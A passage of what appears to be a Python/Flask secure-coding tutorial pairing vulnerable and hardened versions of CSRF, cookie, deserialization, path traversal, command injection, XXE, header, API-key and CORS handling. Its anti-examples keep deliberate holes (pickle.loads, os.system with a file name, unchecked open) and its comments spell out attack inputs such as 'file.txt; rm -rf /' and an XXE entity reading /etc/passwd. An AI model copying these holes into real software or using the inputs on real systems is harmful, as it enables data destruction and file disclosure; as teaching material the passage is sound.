    1. Set CSRF token in cookie
    2. Include same token in form/header
    3. Verify cookie value == form/header value

    Advantage: No server-side storage needed (stateless)
    Works for: APIs, distributed systems
    """

    @staticmethod
    def set_csrf_cookie(response):
        """Set a fresh random CSRF token cookie on ``response``; return the token."""
        token = secrets.token_hex(32)
        response.set_cookie(
            'csrf_token',
            token,
            httponly=False,  # JavaScript needs to read it
            samesite='Strict',
            secure=True,  # HTTPS only
        )
        return token

    @staticmethod
    def validate_token(cookie_token: str, form_token: str) -> bool:
        """Return True when both tokens are present and identical."""
        if not cookie_token or not form_token:
            return False
        # Compare bytes in constant time. compare_digest raises TypeError for
        # str values with non-ASCII characters, and both values here are
        # attacker-controllable request data.
        return hmac.compare_digest(
            cookie_token.encode('utf-8'), form_token.encode('utf-8')
        )
# ✅ SECURE - SameSite cookie attribute
@app.route('/set_session')
def set_session():
    """
    Set a session cookie hardened with the SameSite attribute.

    SameSite options:
    - Strict: Cookie not sent on cross-site requests (best security)
    - Lax: Cookie sent on top-level navigation (GET only)
    - None: Cookie sent on all requests (requires Secure flag)

    NOTE(review): 'abc123' is a fixed demo value; a real session id must be
    random and unique per session.
    """
    from flask import make_response

    cookie_flags = {
        'httponly': True,      # Prevents JavaScript access
        'secure': True,        # HTTPS only
        'samesite': 'Strict',  # CSRF protection
    }
    response = make_response("Session set")
    response.set_cookie('session_id', 'abc123', **cookie_flags)
    return response
# Flask-WTF integration (recommended for Flask)
from flask_wtf import FlaskForm, CSRFProtect
from wtforms import StringField, IntegerField
from wtforms.validators import DataRequired
# Registers Flask-WTF's CSRF protection on the application.
csrf = CSRFProtect(app)


class TransferForm(FlaskForm):
    """Transfer form; Flask-WTF automatically handles CSRF tokens."""

    # Both fields are required (DataRequired).
    to_account = StringField('To', validators=[DataRequired()])
    amount = IntegerField('Amount', validators=[DataRequired()])
@app.route('/transfer_wtf', methods=['GET', 'POST'])
def transfer_wtf():
    """Transfer view using Flask-WTF (handles CSRF automatically).

    On a valid POST the transfer is processed; otherwise the form is rendered.
    The original template was empty, so neither the fields nor the CSRF token
    were ever sent to the browser.
    """
    form = TransferForm()
    if form.validate_on_submit():
        # CSRF token automatically validated
        # NOTE(review): `process_transfer` is not defined in this snippet.
        process_transfer(form.to_account.data, form.amount.data)
        return "Transfer complete"

    # hidden_tag() renders the hidden CSRF field generated by Flask-WTF.
    return render_template_string("""
<form method="POST">
  {{ form.hidden_tag() }}
  {{ form.to_account.label }} {{ form.to_account() }}
  {{ form.amount.label }} {{ form.amount() }}
  <button type="submit">Transfer</button>
</form>
""", form=form)
# ✅ Insecure Deserialization Prevention
import json
import pickle
class SecureDeserialization:
    """
    Contrast unsafe and safe deserialization.

    Unpickling attacker-controlled bytes can lead to Remote Code Execution.
    NEVER use pickle with untrusted data; use JSON, which only produces basic
    types.
    """

    @staticmethod
    def bad_deserialize(data: bytes):
        """❌ DANGEROUS: unpickle ``data`` and return the resulting object."""
        # SECURITY: kept deliberately as the anti-example; never call this
        # with untrusted input.
        restored = pickle.loads(data)  # RCE vulnerability!
        return restored

    @staticmethod
    def safe_deserialize(data: str) -> dict:
        """✅ SAFE: parse ``data`` as JSON and return the decoded value."""
        parsed = json.loads(data)
        return parsed
# ✅ Path Traversal Prevention
import os
from pathlib import Path
class SecureFileAccess:
    """
    Path traversal: attacker accesses files outside the intended directory.

    Attack: filename="../../../etc/passwd"
    """

    def __init__(self, upload_dir: str):
        """Remember the resolved (absolute, symlink-free) upload directory."""
        self.upload_dir = Path(upload_dir).resolve()

    def get_file_bad(self, filename: str):
        """❌ VULNERABLE: No path validation (kept as the anti-example)."""
        # Attack: filename="../../etc/passwd"
        filepath = os.path.join(self.upload_dir, filename)
        # The handle is closed deterministically; the traversal flaw is left
        # in place on purpose.
        with open(filepath, 'r') as handle:
            return handle.read()

    def get_file_safe(self, filename: str):
        """✅ SAFE: read ``filename`` only if it resolves inside the upload dir.

        Raises:
            ValueError: the resolved path is outside the upload directory.
            FileNotFoundError: the path is not an existing regular file.
        """
        # Resolve '..' segments and symlinks before checking containment.
        requested_path = (self.upload_dir / filename).resolve()

        # Compare path components, not string prefixes: with startswith(),
        # "/srv/uploads_evil/x" would pass for upload_dir "/srv/uploads".
        if not requested_path.is_relative_to(self.upload_dir):
            raise ValueError("Invalid file path (path traversal attempt)")

        # is_file() also rejects directories, which exists() would accept.
        if not requested_path.is_file():
            raise FileNotFoundError("File not found")

        return requested_path.read_text()
# ✅ Command Injection Prevention
import subprocess
import shlex
class SecureCommandExecution:
    """
    Command injection: attacker executes arbitrary system commands.

    Attack: filename="file.txt; rm -rf /"
    """

    def run_command_bad(self, filename: str):
        """❌ DANGEROUS: Shell injection (kept as the anti-example)."""
        # Attack: filename="file.txt; rm -rf /"
        # SECURITY: the string is interpreted by a shell; never call this
        # with untrusted input.
        os.system(f"cat {filename}")  # Executes arbitrary commands!

    def run_command_safe(self, filename: str):
        """✅ SAFE: run ``cat`` on ``filename`` without a shell; return stdout.

        The argument list is passed directly to the program, so shell
        metacharacters in ``filename`` have no special meaning.
        """
        result = subprocess.run(
            # '--' ends option parsing, so a name such as "-n" or "--help"
            # is treated as a file name rather than an option.
            ['cat', '--', filename],
            capture_output=True,
            text=True,
            shell=False,  # Critical: don't use shell
        )
        return result.stdout

    def run_command_with_validation(self, filename: str):
        """✅ SAFER: allow-list the file name, then run ``cat`` without a shell.

        Only letters, digits, '_' and '.' are accepted.

        Raises:
            ValueError: ``filename`` contains any other character or is empty.
        """
        # Whitelist allowed characters
        if not filename.replace('_', '').replace('.', '').isalnum():
            raise ValueError("Invalid filename")

        # No shlex.quote here: quoting is only meaningful for shell command
        # strings. With an argument list the added quotes would become part
        # of the file name (as happened for non-ASCII names).
        return self.run_command_safe(filename)
# ✅ XML External Entity (XXE) Prevention
import defusedxml.ElementTree as ET
class SecureXMLParsing:
    """
    XXE attack: attacker uses XML external entities to read files.

    Attack (reconstructed; the original markup was lost in extraction):
        <?xml version="1.0"?>
        <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
        <foo>&xxe;</foo>
    """

    def parse_xml_bad(self, xml_string: str):
        """❌ VULNERABLE: parse with the standard-library ElementTree.

        NOTE(review): how exposed the stdlib parser is depends on the Python
        and expat versions; check the `xml` module's security notes before
        relying on the "XXE" label.
        """
        from xml.etree import ElementTree as stdlib_tree

        root = stdlib_tree.fromstring(xml_string)  # XXE vulnerability!
        return root

    def parse_xml_safe(self, xml_string: str):
        """✅ SAFE: parse with the defusedxml ElementTree (module-level ``ET``)."""
        # defusedxml disables external entity processing
        root = ET.fromstring(xml_string)
        return root
from flask import Flask, make_response
class SecurityHeaders:
    """
    Essential HTTP security headers.

    These headers protect against various attacks and should be set on all
    responses.
    """

    @staticmethod
    def add_security_headers(response):
        """Set all security headers on ``response`` and return it.

        ``response`` only needs a mutable ``headers`` mapping.
        """
        headers = response.headers

        # Prevent clickjacking attacks
        headers['X-Frame-Options'] = 'DENY'

        # Prevent MIME type sniffing
        headers['X-Content-Type-Options'] = 'nosniff'

        # Disable the legacy browser XSS auditor. The header is deprecated
        # and "1; mode=block" can itself introduce vulnerabilities in older
        # browsers; the CSP below is the actual XSS defence.
        headers['X-XSS-Protection'] = '0'

        # Content Security Policy (CSP)
        # Prevents XSS by controlling resource loading
        headers['Content-Security-Policy'] = (
            "default-src 'self'; "
            "script-src 'self' https://trusted-cdn.com; "
            "style-src 'self' 'unsafe-inline'; "
            "img-src 'self' data: https:; "
            "font-src 'self'; "
            "connect-src 'self'; "
            "frame-ancestors 'none'; "
            "base-uri 'self'; "
            "form-action 'self'"
        )

        # HTTP Strict Transport Security (HSTS)
        # Forces HTTPS for future requests
        headers['Strict-Transport-Security'] = (
            'max-age=31536000; includeSubDomains; preload'
        )

        # Referrer Policy
        # Controls how much referrer information is sent
        headers['Referrer-Policy'] = 'strict-origin-when-cross-origin'

        # Permissions Policy (formerly Feature Policy)
        # Disable dangerous features
        headers['Permissions-Policy'] = (
            'geolocation=(), '
            'microphone=(), '
            'camera=(), '
            'payment=()'
        )
        return response
# Apply to Flask app
# New Flask application for the security-header example (rebinds `app`).
app = Flask(__name__)


@app.after_request
def apply_security_headers(response):
    """Run every outgoing response through ``SecurityHeaders``."""
    hardened = SecurityHeaders.add_security_headers(response)
    return hardened
from functools import wraps
from flask import request, jsonify
import time
class APISecurityManager:
    """
    API security helpers: API-key authentication, rate limiting and
    Content-Type validation, each provided as a decorator.
    """

    def __init__(self):
        self.rate_limiter = {}  # In production, use Redis
        self.api_keys = {}  # In production, use database

    def _lookup_api_key(self, api_key: str):
        """Return ``(found, info)`` for ``api_key`` using constant-time compares.

        Every stored key is compared with ``hmac.compare_digest`` and the loop
        never exits early, so timing does not reveal which key (if any)
        matched. The original comment promised a constant-time comparison but
        the code used a plain dict membership test.

        NOTE(review): assumes the keys of ``self.api_keys`` are strings.
        """
        import hmac

        presented = api_key.encode('utf-8')
        found, info = False, None
        for known_key, known_info in self.api_keys.items():
            if hmac.compare_digest(str(known_key).encode('utf-8'), presented):
                found, info = True, known_info
        return found, info

    def require_api_key(self, f):
        """
        API key authentication decorator.

        Usage: @require_api_key
        Header: X-API-Key: your-api-key

        Responds with 401 when the header is missing or the key is unknown.
        On success the stored key info is attached as ``request.api_key_info``.
        """
        @wraps(f)
        def decorated(*args, **kwargs):
            api_key = request.headers.get('X-API-Key')
            if not api_key:
                return jsonify({'error': 'API key required'}), 401

            # Validate API key (constant-time comparison)
            found, info = self._lookup_api_key(api_key)
            if not found:
                return jsonify({'error': 'Invalid API key'}), 401

            # Add API key info to request context
            request.api_key_info = info
            return f(*args, **kwargs)
        return decorated

    def rate_limit(self, max_requests: int, window_seconds: int):
        """
        Sliding-window rate limiting decorator.

        Usage: @rate_limit(max_requests=100, window_seconds=60)

        Requests are counted per client and per decorated function. A client
        is identified by its ``X-API-Key`` header, or by the remote address
        when the header is absent. Responds with 429 once ``max_requests``
        requests fall within the last ``window_seconds``.

        NOTE(review): the header value is not validated here, so apply
        ``require_api_key`` outside this decorator; otherwise a caller can
        rotate header values to get fresh buckets.
        """
        def decorator(f):
            @wraps(f)
            def decorated(*args, **kwargs):
                # Get client identifier (API key, IP, user ID)
                client_id = request.headers.get('X-API-Key') or request.remote_addr
                current_time = time.time()
                key = f"{client_id}:{f.__name__}"

                # Keep only the timestamps still inside the window.
                recent = [
                    t for t in self.rate_limiter.get(key, [])
                    if current_time - t < window_seconds
                ]
                self.rate_limiter[key] = recent

                # Check if limit exceeded
                if len(recent) >= max_requests:
                    return jsonify({
                        'error': 'Rate limit exceeded',
                        'retry_after': window_seconds
                    }), 429

                # Record this request
                recent.append(current_time)
                return f(*args, **kwargs)
            return decorated
        return decorator

    def validate_content_type(self, expected_type: str):
        """
        Decorator that requires the Content-Type header to start with
        ``expected_type``; otherwise responds with 415.

        Prevents attacks that exploit content type confusion.
        """
        def decorator(f):
            @wraps(f)
            def decorated(*args, **kwargs):
                content_type = request.headers.get('Content-Type', '')
                if not content_type.startswith(expected_type):
                    return jsonify({
                        'error': f'Content-Type must be {expected_type}'
                    }), 415
                return f(*args, **kwargs)
            return decorated
        return decorator
# Usage example
security = APISecurityManager()


# Decorators apply bottom-up, so a request is checked in this order:
# API key -> rate limit -> Content-Type -> view.
# NOTE(review): the route declares no `methods`, so it presumably serves GET
# only, while validate_content_type answers 415 unless a Content-Type header
# starting with 'application/json' is sent. Confirm that is intended.
@app.route('/api/data')
@security.require_api_key
@security.rate_limit(max_requests=100, window_seconds=60)
@security.validate_content_type('application/json')
def get_data():
    """Secured API endpoint"""
    return jsonify({'data': 'sensitive information'})
# CORS Security
from flask_cors import CORS
# ❌ BAD: Allow all origins. Shown as a comment only: left as live code, the
# wildcard policy would actually be installed on the app.
# CORS(app, origins="*")  # Insecure!

# ✅ GOOD: Whitelist specific origins
CORS(app, origins=[
    "https://trusted-domain.com",
    "https://app.trusted-domain.com",
])